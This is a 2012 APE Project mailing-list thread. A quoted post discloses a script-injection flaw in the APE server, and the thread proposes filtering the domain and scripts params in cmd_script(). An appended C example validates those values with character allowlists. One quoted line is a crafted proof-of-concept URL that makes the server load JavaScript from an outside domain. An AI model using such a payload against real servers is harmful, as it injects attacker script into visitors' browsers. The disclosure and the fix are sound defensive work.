He did mention src/cmd.c

On Dec 12, 2012 1:15 PM, "UTAN" <[email protected]> wrote:
> Have you released any patch? If you made some workaround, what file
> should we patch?
>
> On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote:
> > I managed recently with an issue that allows injecting any JS script by
> > preparing a link like:
> > http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}]
> >
> > It allows either attaching a script from your URL or injecting a script
> > directly, such as in this example.
> >
> > The solution for this issue is to filter both params domain and scripts
> > in file src/cmd.c (function: cmd_script()) in ape server.
>
> --
> You received this message because you are subscribed to the Google
> Groups "APE Project" group.
> To post to this group, send email to [email protected]
> To unsubscribe from this group, send email to
> [email protected]
> For more options, visit this group at
> http://groups.google.com/group/ape-project?hl=en
> ---
> APE Project (Ajax Push Engine)
> Official website : http://www.ape-project.org/
> Git Hub : http://github.com/APE-Project/
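
The filtering of the `domain` and `scripts` params proposed in the quoted message could look like the following. This is an added example, not code from the APE project or from the posters: the helper names, the character allowlist and the length limits are assumptions, and the call site inside `cmd_script()` is not shown on the page.

```c
#include <stddef.h>
#include <string.h>

/* ASCII-only test, independent of the process locale. */
static int is_ascii_alnum(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') ||
           (c >= 'A' && c <= 'Z');
}

/* Hypothetical helper: accept only a plain DNS name (labels of letters,
 * digits and '-', separated by single dots). */
int is_safe_domain(const char *s)
{
    size_t i, len, label = 0;

    if (s == NULL || (len = strlen(s)) == 0 || len > 253)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            if (label == 0)
                return 0;            /* leading dot or empty label */
            label = 0;
        } else if ((is_ascii_alnum(c) || c == '-') && label < 63) {
            label++;
        } else {
            return 0;                /* quote, bracket, space, ... */
        }
    }
    return label > 0;                /* reject a trailing dot */
}

/* Hypothetical helper: accept only http(s) URLs built from an allowlist of
 * characters, so quotes, angle brackets, backslashes and whitespace never
 * reach the generated markup. The 2048-byte cap is an assumption. */
int is_safe_script_url(const char *s)
{
    static const char extra[] = "-._~/:?=&%+";
    size_t i;

    if (s == NULL)
        return 0;
    if (strncmp(s, "http://", 7) != 0 && strncmp(s, "https://", 8) != 0)
        return 0;
    for (i = 0; s[i] != '\0'; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!is_ascii_alnum(c) && strchr(extra, c) == NULL)
            return 0;
    }
    return i <= 2048;
}
```

A request would be rejected if `domain` fails `is_safe_domain()` or any entry of `scripts` fails `is_safe_script_url()`; the checks run on the values after URL and JSON decoding, which is where the quote in the link above appears.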
